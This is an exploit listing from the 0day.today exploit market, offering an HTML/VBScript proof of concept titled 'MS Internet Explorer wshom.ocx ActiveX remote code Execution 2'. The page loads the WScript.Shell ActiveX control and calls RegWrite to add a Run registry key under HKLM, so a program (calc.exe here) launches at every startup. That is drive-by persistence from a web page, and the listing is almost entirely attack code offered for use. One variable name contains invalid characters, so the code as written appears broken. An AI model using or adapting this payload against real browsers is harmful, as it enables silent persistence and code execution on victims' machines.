[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MS Internet Explorer wshom.ocx ActiveX remote code Execution 2

Author
germaya_x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10100
Category
remote exploits
Date add
16-01-2010
Platform
unsorted
================================================================================
MS Internet Explorer wshom.ocx ActiveX remote code Execution 2 (insecure method)
================================================================================


#tested on : windows 7 , windows vista ,windows xp sp2
#n0te:you can use it by run it then restart the computer once it open you will show the calc.exe
==============================================================================
<html>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>
<script language='vbscript'>
 
targetFile = "c:\WINDOWS\system32\wshom.ocx"
prototype  = "Sub RegWrite ( ByVal Name As String ,  ByRef Value As Variant ,  [ ByRef Type As Variant ] )"
memberName = "RegWrite"
progid     = "IWshRuntimeLibrary.IWshShell_Class"
argCount   = 3
 
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
germaya_x="C:\WINDOWS\system32\calc.exe"
his0k4="REG_SZ"
 
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4
 
</script>



#  0day.today [2024-11-15]  #